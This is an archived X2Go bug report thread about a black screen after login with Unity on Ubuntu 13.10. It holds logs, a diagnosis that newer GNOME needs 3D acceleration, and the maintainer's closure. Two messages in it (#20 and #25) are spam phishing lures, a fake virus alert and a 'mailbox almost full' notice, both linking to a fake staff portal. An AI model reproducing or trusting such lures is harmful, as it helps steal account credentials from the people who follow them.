X2Go Bug report logs - #401
Fwd: Unity only black screen after correctly logging in - 13.10 Ubuntu 64 bit

version graph

Package: x2goserver; Maintainer for x2goserver is X2Go Developers <x2go-dev@lists.x2go.org>; Source for x2goserver is src:x2goserver.

Reported by: Gino Eising <djieno@djieno.com>

Date: Thu, 16 Jan 2014 22:00:02 UTC

Severity: normal

Found in version 4.1.0.0-0~925~ubuntu13.10.1

Done: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#401; Package x2goserver. (Thu, 16 Jan 2014 22:00:02 GMT) (full text, mbox, link).


Acknowledgement sent to Gino Eising <djieno@djieno.com>:
New Bug report received and forwarded. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Thu, 16 Jan 2014 22:00:02 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.x2go.org (full text, mbox, reply):

From: Gino Eising <djieno@djieno.com>
To: submit@bugs.x2go.org
Subject: Fwd: Unity only black screen after correctly logging in - 13.10 Ubuntu 64 bit
Date: Thu, 16 Jan 2014 22:57:27 +0100
[Message part 1 (text/plain, inline)]
Package: x2goserver
Version: 4.1.0.0-0~925~ubuntu13.10.1

---------- Forwarded message ----------
From: Gino Eising <djieno@djieno.com>
Date: Thu, Jan 16, 2014 at 10:54 PM
Subject: Fwd: Unity only black screen after correctly logging in - 13.10
Ubuntu 64 bit
To: submit@bugs.x2go.org


From: Gino Eising <djieno@djieno.com>

Date: Thu, Jan 16, 2014 at 10:49 PM
Subject: Unity only black screen after correctly logging in - 13.10 Ubuntu
64 bit
To: submit@bugs.x2go.org



Dear developer,

I Couldn't find any solution for the following:

*Afte logging correctly, the x2g0 letters disappear and the screen remains
black. Nothing happends. *

Testen on two 13.10 server sides and one ubuntu client and one windows
client. All same results. I hope you have enough info and I you have any
question, don't hesitate to ask me. I can also give a login if you'd like
to test it.

Regards,

Gino Eising
Amsterdam

Logging and information about the used packages:


*On the server side:*

root@ltsp:~# dpkg -l | grep x2go
ii  libx2go-log-perl                      4.1.0.0-0~925~ubuntu13.10.1
                    amd64        Perl X2Go::Log package
ii  libx2go-server-db-perl                4.1.0.0-0~925~ubuntu13.10.1
                    amd64        Perl X2Go::Server:DB package
ii  libx2go-server-perl                   4.1.0.0-0~925~ubuntu13.10.1
                    amd64        Perl X2Go::Server package
ii  x2goagent                             2:3.5.0.23-0~390~ubuntu13.10.1
                     all          X2Go agent
ii  x2goplugin-provider                   4.0.1.0-1
                    all          Provide X2Go Plugin via Apache webserver
ii  x2goserver                            4.1.0.0-0~925~ubuntu13.10.1
                    amd64        X2Go server
ii  x2goserver-common                     4.1.0.0-0~925~ubuntu13.10.1
                    amd64        X2Go Server (common files)
ii  x2goserver-extensions                 4.1.0.0-0~925~ubuntu13.10.1
                    all          X2Go Server (extension support)
ii  x2goserver-fmbindings                 4.1.0.0-0~925~ubuntu13.10.1
                    all          X2Go Server (file manager bindings)
ii  x2goserver-printing                   4.1.0.0-0~925~ubuntu13.10.1
                    all          X2Go server (printing support)
ii  x2goserver-xsession                   4.1.0.0-0~925~ubuntu13.10.1
                    all          X2Go Server (Xsession runner)

root@ltsp:~# cat /etc/issue
Ubuntu 13.10 \n \l

root@ltsp:~# uname -a
Linux ltsp 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:35:23 UTC 2013
x86_64 x86_64 x86_64 GNU/Linux


Logging while conecting (syslog)
Jan 16 22:26:03 ltsp /usr/bin/x2goresume-session: client 192.168.1.20 has
successfully resumed session with ID djieno-61-1389907392_stDUNITY_dp24
Jan 16 22:26:05 ltsp /usr/bin/x2gomountdirs[13102]: successfully mounted
djieno@127.0.0.1:30036/home/djieno/.x2go/S-djieno-61-1389907392_stDUNITY_dp24/spoolto
/tmp/.x2go-djieno/spool/C-djieno-61-1389907392_stDUNITY_dp24
Jan 16 22:35:01 ltsp CRON[13121]: (root) CMD (command -v debian-sa1 >
/dev/null && debian-sa1 1 1)

*On the client side:*

djieno@deskbuntu:~$ dpkg -l | grep x2go
ii  x2goclient                                4.0.1.0-1
           amd64        X2Go Client application (Qt4)
ii  x2goplugin                                4.0.1.0-1
           amd64        X2Go Client (Qt4) as browser plugin

djieno@deskbuntu:~$ cat /etc/issue
Ubuntu 13.10 \n \l

djieno@deskbuntu:~$ uname -a
Linux deskbuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC
2013 x86_64 x86_64 x86_64 GNU/Linux

Logging from starting x2goclient - console:

djieno@deskbuntu:~$ x2goclient
ONMainWindow constructor

Can't load translator (:/x2goclient_nl_nl) !

Can't load translator  :/qt_nl_NL
ONMainWindows constructor finished, home Directory is: "/home/djieno"

read  4  sessions from config file
start new ssh connection to server: "ltsp" : "22" krb:  false

ssh connection ok

continue normal x2go session

Agent output: "gr_port=30034
sound_port=30035
fs_port=30036
"
new gr_port:  "30034"

new sound_port:  "30035"

new fs_port:  "30036"

starting nxproxy with:  "nxproxy -S
nx/nx,options=/home/djieno/.x2go/S-djieno-61-1389907392_stDUNITY_dp24/options:61"

"
NXPROXY - Version 3.5.0

Copyright (C) 2001, 2011 NoMachine.
See http://www.nomachine.com/ for more information.

Info: Proxy running in client mode with pid '5157'.
Session: Starting session at 'Thu Jan 16 22:26:03 2014'.
Info: Connecting to remote host 'localhost:31034'.
Info: Connection to remote proxy 'localhost:31034' established.
"

"Info: Connection with remote proxy completed.
Warning: Unrecognized session type 'unix-kde-depth_24'. Assuming agent
session.
"

 "Info: Using LAN link parameters 1536/24/1/0.
Info: Using pack method '16m-jpeg-9' with session 'unix-kde-depth_24'.
Info: Not using NX delta compression.
Info: Not using ZLIB data compression.
Info: Not using ZLIB stream compression.
Info: Not using a persistent cache.
Info: Forwarding X11 connections to display ':0'.
Session: Session started at 'Thu Jan 16 22:26:04 2014'.
"

"Info: Established X server connection.
Info: Using shared memory parameters 1/2048K.
"

Generating public/private rsa key pair.
Your identification has been saved in /home/djieno/.x2go/ssh/gen/key.TJ5145.
Your public key has been saved in /home/djieno/.x2go/ssh/gen/key.TJ5145.pub.
The key fingerprint is:
34:------:14:0c:2e:f9 djieno@deskbuntu
The key's randomart image is:
+--[ RSA 1024]----+
|+                |
+-----------------+
key created on:  "/home/djieno/.x2go/ssh/gen/key.TJ5145"
starting fs tunnel for: "djieno-61-1389907392_stDUNITY_dp24"
fs port:  "30036"
proxy win found: 73400472
exported key  "/home/djieno/.x2go/ssh/gen/key.TJ5145"
key removed
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#401; Package x2goserver. (Tue, 18 Mar 2014 15:05:02 GMT) (full text, mbox, link).


Acknowledgement sent to "Wilbur Harvey" <wharvey@pwnets.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Tue, 18 Mar 2014 15:05:02 GMT) (full text, mbox, link).


Message #10 received at 401@bugs.x2go.org (full text, mbox, reply):

From: "Wilbur Harvey" <wharvey@pwnets.com>
To: <401@bugs.x2go.org>
Subject: X2GO Client Black Screen
Date: Tue, 18 Mar 2014 07:51:47 -0700
[Message part 1 (text/plain, inline)]
I have the same problem.
I have tried with both the Windows and Linux clients.
I have tried installing on two Ubuntu 13.10 systems for the server side.
 
Wilbur Harvey
Principal Hardware Engineer
PureWave Networks
3951 Burton Dr. Santa Clara, CA 95054
Tel: 650 528 5262
Email: wharvey@pwnets.com
 
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.berlios.de, X2Go Developers <x2go-dev@lists.berlios.de>:
Bug#401; Package x2goserver. (Fri, 04 Apr 2014 21:10:02 GMT) (full text, mbox, link).


Acknowledgement sent to "Matthew L. Dailey" <matthew.l.dailey@dartmouth.edu>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.berlios.de>. (Fri, 04 Apr 2014 21:10:02 GMT) (full text, mbox, link).


Message #15 received at 401@bugs.x2go.org (full text, mbox, reply):

From: "Matthew L. Dailey" <matthew.l.dailey@dartmouth.edu>
To: 401@bugs.x2go.org
Subject: Re: Unity only black screen after correctly logging in - 13.10 Ubuntu 64 bit
Date: Fri, 4 Apr 2014 16:59:36 -0400
I ran into this today on Ubuntu 14.04 and wanted to just post some updates I found after digging around a bit. Essentially, this doesn’t look like anything X2Go can fix. Since version 3.8, gnome-session refuses to start without 3D acceleration, which isn’t possible over an X2Go session. Unless there’s some workaround added to allow gnome-session without hardware acceleration, we’re probably out of luck. One workaround is to use xfce instead. I haven’t tried this yet myself, but I expect it would probably work fine.

Here are a couple of links with details:
<https://bugs.launchpad.net/bugs/1251281>
<https://groups.google.com/forum/#!msg/synnefo-devel/oo5LiGr4YY4/znfZaqwe0yMJ>

-- 
Matthew L. Dailey
Senior Systems Engineer
Thayer School of Engineering
Dartmouth College


Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#401; Package x2goserver. (Thu, 28 Aug 2014 11:45:01 GMT) (full text, mbox, link).


Acknowledgement sent to Yvette Pagan <ypagan@ft.newyorklife.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 28 Aug 2014 11:45:02 GMT) (full text, mbox, link).


Message #20 received at 401@bugs.x2go.org (full text, mbox, reply):

From: Yvette Pagan <ypagan@ft.newyorklife.com>
To: Yvette Pagan <ypagan@ft.newyorklife.com>
Subject: RE: HELP DESK ALERT.
Date: Thu, 28 Aug 2014 11:34:26 +0000
[Message part 1 (text/plain, inline)]
Virus Alert  Are You the Right Full Owner Of This Email Account? Click Here<http://faculty-stafff-portalll.jigsy.com/> To Confirm Or It Will Be Shut Down
Copyright © 2014 Trustees of Dartmouth College
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#401; Package x2goserver. (Tue, 02 Sep 2014 13:30:01 GMT) (full text, mbox, link).


Acknowledgement sent to "Reis, Melanie" <Melanie.Reis@flhosp.org>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Tue, 02 Sep 2014 13:30:02 GMT) (full text, mbox, link).


Message #25 received at 401@bugs.x2go.org (full text, mbox, reply):

From: "Reis, Melanie" <Melanie.Reis@flhosp.org>
To: undisclosed-recipients:;
Subject: Your mailbox is almost full.
Date: Tue, 2 Sep 2014 13:10:24 +0000
[Message part 1 (text/plain, inline)]
Your mailbox is almost full.
2426MB                       2500MB
Current size Maximum size
Please click or copy and paste the link on your browser CLICK HERE<http://faculty-stafffportalll.jigsy.com/>:  to reduce your mailbox size and increase the size to 3500MB.































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































This message (including any attachments) is intended only for the use of the individual or entity to which it is addressed and may contain information that is non-public, proprietary, privileged, confidential, and exempt from disclosure under applicable law or may constitute as attorney work product. If you are not the intended recipient, you are hereby notified that any use, dissemination, distribution, or copying of this communication is strictly prohibited. If you have received this communication in error, notify us immediately by telephone and (i) destroy this message if a facsimile or (ii) delete this message immediately if this is an electronic communication. Thank you.
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#401; Package x2goserver. (Fri, 12 Dec 2014 10:15:02 GMT) (full text, mbox, link).


Acknowledgement sent to Phillip Wilson <phillipwils@gmail.com>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 12 Dec 2014 10:15:02 GMT) (full text, mbox, link).


Message #30 received at 401@bugs.x2go.org (full text, mbox, reply):

From: Phillip Wilson <phillipwils@gmail.com>
To: 401@bugs.x2go.org
Subject: Xfce black screen after correctly logging in CentOS 7
Date: Fri, 12 Dec 2014 02:12:41 -0800
[Message part 1 (text/plain, inline)]
After updating x2goserver and x2goserver-xsession on CentOS 7, the x2go
client can no longer maintain a x2go session with the x2go server; that is,
client connects, a black screen with the X2GO logo is displayed, and the
session is terminated.   A full system update was done which also included
updates for installed x2go packages. If the previous x2goserver and
x2goserver-xsession packages are re-installed, everything works as
expected.  The client and server software details are listed below.


X2GoClient_latest_mswin32-setup.exe (x2goclient-4.0.3.0-20141021-setup.exe
<http://code.x2go.org/releases/binary-win32/x2goclient/releases/4.0.3.0-20141021/x2goclient-4.0.3.0-20141021-setup.exe>
)

After upgrading from x2goserver-4.0.1.15-2.el7.x86_64 and
x2goserver-xsession-4.0.1.15-2.el7.x86_64 to
x2goserver-4.0.1.18-3.el7.x86_64 and
x2goserver-xsession-4.0.1.18-3.el7.x86_64.


sessions file on client machine:

Loop: WARNING! Unrecognized session type 'unix-kde-depth_32'. Assuming
agent session.
Auth: WARNING! Failed to read data from the X auth command.
Auth: WARNING! Generating a fake cookie for X authentication.
Loop: WARNING! Could not retrieve the X server authentication cookie.



session.log file from server:

running as X2Go Agent

NXAGENT - Version 3.5.0

Copyright (C) 2001, 2011 NoMachine.
See http://www.nomachine.com/ for more information.

Info: Agent running with pid '10668'.
Session: Starting session at 'Fri Dec 12 01:26:16 2014'.
Info: Proxy running in server mode with pid '10668'.
Info: Waiting for connection from 'localhost' on port '30021'.
Info: Accepted connection from '127.0.0.1'.
Info: Connection with remote proxy completed.
Info: Using ADSL link parameters 512/24/1/0.
Info: Using agent parameters 5000/10/50/0/0.
Info: Using cache parameters 4/4096KB/8192KB/8192KB.
Info: Using pack method '16m-jpeg-9' with session 'unix-kde-depth_32'.
Info: Using ZLIB data compression 1/1/32.
Info: Using ZLIB stream compression 4/4.
Info: No suitable cache file found.
Info: Listening to X11 connections on display ':56'.
Info: Established X client connection.
Info: Using shared memory parameters 1/1/0/0K.
Info: Using alpha channel in render extension.
Info: Not using local device configuration changes.
keyboard file created
Session: Session started at 'Fri Dec 12 01:26:26 2014'.
Session: Terminating session at 'Fri Dec 12 01:26:27 2014'.
Info: Waiting the cleanup timeout to complete.
Session: Session terminated at 'Fri Dec 12 01:26:27 2014'.
 FD#4 channel ID#1.
[Message part 2 (text/html, inline)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#401; Package x2goserver. (Thu, 08 Jan 2015 22:40:01 GMT) (full text, mbox, link).


Acknowledgement sent to Mike Gabriel <mike.gabriel@das-netzwerkteam.de>:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Thu, 08 Jan 2015 22:40:01 GMT) (full text, mbox, link).


Message #35 received at 401@bugs.x2go.org (full text, mbox, reply):

From: Mike Gabriel <mike.gabriel@das-netzwerkteam.de>
To: 401@bugs.x2go.org
Subject: Unity-2d / X2Go support ends with EOL of Ubuntu 12.04
Date: Thu, 08 Jan 2015 22:36:30 +0000
[Message part 1 (text/plain, inline)]
Control: close -1

For those you have not noticed, yet. Unity and X2Go (with current NX  
code) only work with Ubuntu 12.04 (unity-2d desktop shell) and the  
unity-2d has been discontinued since then.

Once Ubuntu 12.04 has reached its end of line, the Unity+X2Go support  
will end, as well.

Thus, closing #401 in X2Go BTS [1].

Mike

[1] http://bugs.x2go.org/401


-- 

DAS-NETZWERKTEAM
mike gabriel, herweg 7, 24357 fleckeby
fon: +49 (1520) 1976 148

GnuPG Key ID 0x25771B31
mail: mike.gabriel@das-netzwerkteam.de, http://das-netzwerkteam.de

freeBusy:
https://mail.das-netzwerkteam.de/freebusy/m.gabriel%40das-netzwerkteam.de.xfb
[Message part 2 (application/pgp-signature, inline)]

Marked Bug as done Request was from Mike Gabriel <mike.gabriel@das-netzwerkteam.de> to 401-submit@bugs.x2go.org. (Thu, 08 Jan 2015 22:40:02 GMT) (full text, mbox, link).


Notification sent to Gino Eising <djieno@djieno.com>:
Bug acknowledged by developer. (Thu, 08 Jan 2015 22:40:02 GMT) (full text, mbox, link).


Bug archived. Request was from Debbugs Internal Request <owner@bugs.x2go.org> to internal_control@bugs.x2go.org. (Fri, 06 Feb 2015 06:24:02 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


X2Go Developers <owner@bugs.x2go.org>. Last modified: Thu Dec 12 09:33:27 2019; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.